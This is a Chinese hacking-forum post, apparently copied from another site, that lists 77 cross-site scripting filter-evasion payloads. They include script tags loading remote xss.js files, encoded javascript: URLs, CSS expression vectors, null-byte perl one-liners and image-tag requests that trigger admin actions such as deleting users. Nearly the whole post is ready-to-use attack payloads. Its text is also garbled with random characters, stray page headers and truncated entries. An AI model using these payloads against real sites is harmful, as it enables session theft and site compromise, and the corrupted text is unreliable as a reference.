貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。+ F7 z3 M% _# R- Y
(1)普通的XSS JavaScript注入
0 ]1 k' C- B) f: v! v! n<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 p6 D; L1 _, @6 P/ X(2)IMG标签XSS使用JavaScript命令
5 A5 p% q1 X$ I* _. e<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- A- E1 Y; M7 L" O5 t(3)IMG标签无分号无引号
1 U4 W) S0 v7 F; q<IMG SRC=javascript:alert(‘XSS’)>
3 A8 q9 c+ I: C1 P ^" a+ @(4)IMG标签大小写不敏感9 U% Q! _$ s6 L- ^( z+ A
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! c& M/ b# i: E) J$ J, b' A(5)HTML编码(必须有分号)
: a7 E6 `3 A0 q, W2 ~4 {+ g<IMG SRC=javascript:alert(“XSS”)>
$ r4 C u6 }0 @7 J& t" P n(6)修正缺陷IMG标签+ l, n. h" I* V# P, S+ L7 L: r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; Z( X! Q& X) o! B7 ~/ B9 v! B
; O% O- n- @! j6 ]# ]. P
, [6 l# W: C; S5 g+ ?8 r6 u(7)formCharCode标签(计算器)
8 x4 }& @4 q( |<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( e7 w+ g; ^& p* L(8)UTF-8的Unicode编码(计算器); K3 O9 u8 n6 q; Q% p
<IMG SRC=jav..省略..S')>
% ~( s! c. B2 S+ b(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ s' a" o# X' B: |
<IMG SRC=jav..省略..S')>
4 _: H5 p7 O' f r& o# M* q(10)十六进制编码也是没有分号(计算器). f( M" N& L8 W" @7 j$ ]$ h
<IMG SRC=java..省略..XSS')>
( J& a0 W3 o* p; x! H/ |7 D(11)嵌入式标签,将Javascript分开# O- C: Y3 n& T+ V
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 s8 b' z V* f, v9 C1 V; g
(12)嵌入式编码标签,将Javascript分开
1 g4 c5 C. z9 t8 f8 @% u7 ]8 y4 C e4 [<IMG SRC=”jav ascript:alert(‘XSS’);”>
- ~' `8 M: k) T/ o3 L0 N1 L(13)嵌入式换行符
! a! G" V% h: ~+ Y9 r% ]* ^8 |<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 h, h: i% s N' X- N(14)嵌入式回车" ], ]5 Q) l, j' Z6 m' r/ N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 H3 R+ I: \& n8 c1 h(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- d3 C, a2 M, }4 Y# u* F: F<IMG SRC=”javascript:alert(‘XSS‘)”>
6 W& s; W: ?, Y2 ?" d(16)解决限制字符(要求同页面)% V% g- B; ^3 B4 c
<script>z=’document.’</script>- N$ B- b% {, y% u
<script>z=z+’write(“‘</script>5 o1 {5 [/ P) x6 T
<script>z=z+’<script’</script>
4 F6 G& x4 ~3 _<script>z=z+’ src=ht’</script>
7 B. j& C9 [2 P' _* A8 j<script>z=z+’tp://ww’</script>
! m2 L% `: m/ F, _<script>z=z+’w.shell’</script>* ~. M* G- I2 ?' F7 q
<script>z=z+’.net/1.’</script>+ g3 \) t+ O) o( B1 }& \1 q s* f9 Z" b
<script>z=z+’js></sc’</script>& Q- t7 p: g j2 `8 a
<script>z=z+’ript>”)’</script>$ q+ S9 ~, U& @+ G% [
<script>eval_r(z)</script>- D; h! p1 q2 n5 _4 l
(17)空字符12-7-1 T00LS - Powered by Discuz! Board5 S3 e. w0 J1 m7 L* ~
https://www.t00ls.net/viewthread ... table&tid=15267 2/6! T' u, [, S G1 a0 n3 j- b+ ]2 A; [
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 X! \. G+ z1 b& v' k- h(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 e* k9 k I) H. }" r6 P q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
; \3 J5 n, T8 U# u, [6 M0 X(19)Spaces和meta前的IMG标签
/ R" m/ G6 l9 ?1 S+ C7 |<IMG SRC=” javascript:alert(‘XSS’);”>
+ I# ^( B; [9 n; v! x(20)Non-alpha-non-digit XSS' P' X! z4 s- K
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- p# b! W' e* P2 }" R1 J
(21)Non-alpha-non-digit XSS to 2/ N9 Z6 a, m: u) {6 F( l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ N4 M8 n \7 j" O- L Q
(22)Non-alpha-non-digit XSS to 32 f8 w/ ]) N& [; L! u/ y! d( u
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, _+ E8 M6 q4 Y$ D& o; ]4 }(23)双开括号
+ L- O/ |$ O Y; T( S& q4 j5 u& r<<SCRIPT>alert(“XSS”);//<</SCRIPT>& F- G& |! C" R& w8 |. {1 H
(24)无结束脚本标记(仅火狐等浏览器)
4 q1 D. p, s+ c9 L; k- l4 v& B<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>0 a! G& N7 w5 j$ \5 m0 {
(25)无结束脚本标记2. p+ M% r/ w& d0 }5 C0 }
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 L5 R, [0 J8 t1 I- S(26)半开的HTML/JavaScript XSS
" {7 m, S8 l! a7 E' i<IMG SRC=”javascript:alert(‘XSS’)”5 {9 U6 h, k/ q8 S
(27)双开角括号
+ w8 |7 }" T& }' D/ Z<iframe src=http://3w.org/XSS.html <
: D& s* Y& A8 U# e9 w(28)无单引号 双引号 分号
4 C" Z5 q- x: N& C+ R<SCRIPT>a=/XSS/: g/ ^( @( a8 N0 l$ f) k& R$ X# o
alert(a.source)</SCRIPT>) X( }% ~" R! u& }: t, I# m! f1 m
(29)换码过滤的JavaScript0 u; k, M; E* V1 C' t
\”;alert(‘XSS’);//, p& ^5 G* {4 ?) f) e
(30)结束Title标签
! f1 a5 p/ s& v$ F; Q</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. n, f8 s" o6 }7 ~' D8 e1 N, Y
(31)Input Image3 C; y! @( M1 x
<INPUT SRC=”javascript:alert(‘XSS’);”>
3 i4 A6 E) X Y/ P(32)BODY Image
4 Q$ r" i# z# ?0 H. Z% k<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" f7 F* r) O( A% g& D T(33)BODY标签( v8 R5 Y/ S" g; i3 U
<BODY(‘XSS’)>
8 \4 p5 S+ W8 E! p! s(34)IMG Dynsrc
" \6 R: \) a( n7 |0 T1 {<IMG DYNSRC=”javascript:alert(‘XSS’)”>
j8 Q7 g" R6 [, T(35)IMG Lowsrc$ u2 G7 b* ^) n& v
<IMG LOWSRC=”javascript:alert(‘XSS’)”>" {" g) V4 G' u
(36)BGSOUND
! k2 z, p9 F0 C( ?3 Y3 p0 o! F( k6 S<BGSOUND SRC=”javascript:alert(‘XSS’);”>; p- ~8 p+ ~0 q" W8 E' M3 r
(37)STYLE sheet
( J5 _* S. E& Y0 @) Q% r<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>" P1 X- d) e( _4 a' @; |
(38)远程样式表) A( l3 g# ^0 c. e/ G ^( N
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( H. ?7 U. C$ x# J$ M4 ]* \
(39)List-style-image(列表式)0 s, ^8 s5 g* x& u$ x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS7 f8 h; J% Y2 b- f! d0 R
(40)IMG VBscript1 \' |) e+ i& r5 Y1 z6 |3 y: g
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS$ T. W( N. ?3 Q' N# g! w
(41)META链接url, j6 m7 v( P- \2 t
: H2 @4 w; M- y |2 Y" o1 E( D- [
1 D8 p. Y1 E% c" J0 ^
<META HTTP-EQUIV=”refresh” CONTENT=”0;% K# w7 X3 I! G7 j
URL=http://;URL=javascript:alert(‘XSS’);”>
* {' ^- H( y6 v: v0 i3 U(42)Iframe
2 J/ J* E1 E1 l W `% f<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 n. ~2 c& K/ \' M+ H(43)Frame) f$ P* m/ F4 _6 K
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
- q2 d. ~9 @7 ^4 Z2 ehttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
1 ?9 _( H5 s! N4 C7 ]8 \(44)Table
& U$ j3 Q) o/ @, ^<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
i$ t1 ?8 B8 {$ x% F1 \8 d" }(45)TD
+ H5 q+ O& V+ i7 e<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 B; S& H; m3 o: Y(46)DIV background-image
* R% ^7 `5 w1 I+ F7 a) Z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* P/ G* t0 x2 ](47)DIV background-image后加上额外字符(1-32&34&39&160&8192-4 w- m( |9 s0 R9 q
8&13&12288&65279)' _- |. X9 S+ Y% q) S
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ v- i( n" l, g7 u, e(48)DIV expression
% ~' }5 @2 F8 ]' m! F* e<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
3 \8 t% j) k3 G) x7 j# U! R(49)STYLE属性分拆表达8 j# C6 X6 b1 H: H
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ n7 j$ d( g0 p( `(50)匿名STYLE(组成:开角号和一个字母开头)2 W1 K$ G/ j1 V+ R _, o! x' N2 L3 _
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ T/ A- i' P, X, B. n. [% a G2 E(51)STYLE background-image" C( _) |4 z! {
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
$ ^& L: \+ d& O5 _CLASS=XSS></A>
@) ^$ ] }# E/ ~! a(52)IMG STYLE方式
8 z; W8 _2 o/ ^0 c* V/ x5 {exppression(alert(“XSS”))’># P! L. t! r. E7 q: a
(53)STYLE background1 H- f& `1 t( J/ O; F. [
<STYLE><STYLE6 L* [' @7 f, F( Q
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- s3 L5 ?( c4 f. U) H(54)BASE9 j, \6 M- N" L$ G6 ^4 b$ ?/ E
<BASE HREF=”javascript:alert(‘XSS’);//”>
( [+ B: c: R1 l+ R(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 ]" C3 ?- O" H8 ^- d) C! ~
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
% N/ r% y- C7 G6 l(56)在flash中使用ActionScrpt可以混进你XSS的代码0 s) Z) R$ q. P* f
a=”get”;
0 g/ [- l$ L a5 f- yb=”URL(\”";
4 |8 O: `) J; D g9 h* gc=”javascript:”;# j* t* @4 x# v& ]% S% f/ }+ [. r
d=”alert(‘XSS’);\”)”;
( Y4 s6 c2 R% f" c9 Reval_r(a+b+c+d);" v# a' [" V& u: [) x$ _
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 V8 n9 T5 ]' o. X# f, | }<HTML xmlns:xss>, Y, ^9 d- L' u6 }2 W7 V6 V
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># I5 G2 S2 h- x: J# Q6 V
<xss:xss>XSS</xss:xss>
+ Z1 K W. t5 y: G$ @. `& [% c</HTML>
9 c* Z6 V+ R9 @7 y, X" D(58)如果过滤了你的JS你可以在图片里添加JS代码来利用) v7 y& m9 e4 o* F- n
<SCRIPT SRC=””></SCRIPT>: V, ~" P6 f7 y
(59)IMG嵌入式命令,可执行任意命令7 e1 g: \4 f: W6 O3 T# K3 {
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
1 |" _' ]" r2 m( x; V$ I& g(60)IMG嵌入式命令(a.jpg在同服务器): i' z. `& ~( {: @6 A, d
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser& M1 l. p1 V4 k
(61)绕符号过滤
@$ Q* _) [: t! t* e$ P<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 g% I6 k' j6 M7 `
(62)3 q1 }" m* t+ j6 a/ G4 |& i/ d g# L
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>) b8 G, d6 g w ~
(63)/ _/ x" A, S/ {0 u U6 N/ ^2 W2 j
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; T4 O+ N- t$ j$ p- O/ u/ ]* z
(64)" v: }! D' |. j6 r; I
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>; N l+ F# Y) v/ m
(65)4 v( b% N( i6 z. Y$ v! ^$ I/ Y- y
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
% |- \" d0 `3 y( R4 T(66)12-7-1 T00LS - Powered by Discuz! Board
0 r. J0 K0 o: S" A r3 ihttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
7 D4 T( Z' P; U, y9 X<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% U- x8 D1 p* W(67)# T: T/ i. ~+ C; F3 A$ d2 O" d2 [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>; W* _) S' R; z! \2 _2 _
</SCRIPT>* f- x8 k* o7 c
(68)URL绕行
- U6 c! @* D! i& K<A HREF=”http://127.0.0.1/”>XSS</A>
" \0 `5 A: c$ D- q4 P1 m(69)URL编码* [7 E1 [3 p- `- V% v0 {* h
<A HREF=”http://3w.org”>XSS</A>) r" ^& G$ r2 W- p5 ^$ m+ h1 I
(70)IP十进制
0 m# ^- d) L+ F0 L$ L1 C" h<A HREF=”http://3232235521″>XSS</A>2 q0 E' j' ?; f& f3 x. R
(71)IP十六进制
" }' l3 N' I# ^<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>" w, Q) O, u$ f4 K" ~
(72)IP八进制
- I$ i' K# l; _) s<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 t* t; z$ j$ h# X' @: X' X3 x) P
(73)混合编码
# Q% f# B7 B- n0 r<A HREF=”h
- F& e: J* S q$ Y1 L# ]tt p://6 6.000146.0×7.147/”">XSS</A>
# F! q7 l- a% x, p7 Y. ~8 k8 h(74)节省[http:]
) i0 z- u1 _4 Z+ x' R<A HREF=”//www.google.com/”>XSS</A>
7 y8 ]- }7 u; @; q: s" `9 i(75)节省[www]) ~1 }% K4 G* ~
<A HREF=”http://google.com/”>XSS</A>
/ d- h7 b* M1 @+ q- E(76)绝对点绝对DNS8 O& P( I, B3 T" ^/ w( H$ D7 M
<A HREF=”http://www.google.com./”>XSS</A>% v8 [. x! c) W: u4 S+ ]/ T
(77)javascript链接
! Q* s0 }) j& ?- d6 G<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
/ l1 l5 \! S% n9 C8 A. W" x2 i5 O& g- M3 K0 p
原文地址:http://fuzzexp.org/u/0day/?p=14 U% M, _+ O X) ?
! r/ W0 P, k# y
|
发表于 2013-4-19 19:22:37
收藏
支持
反对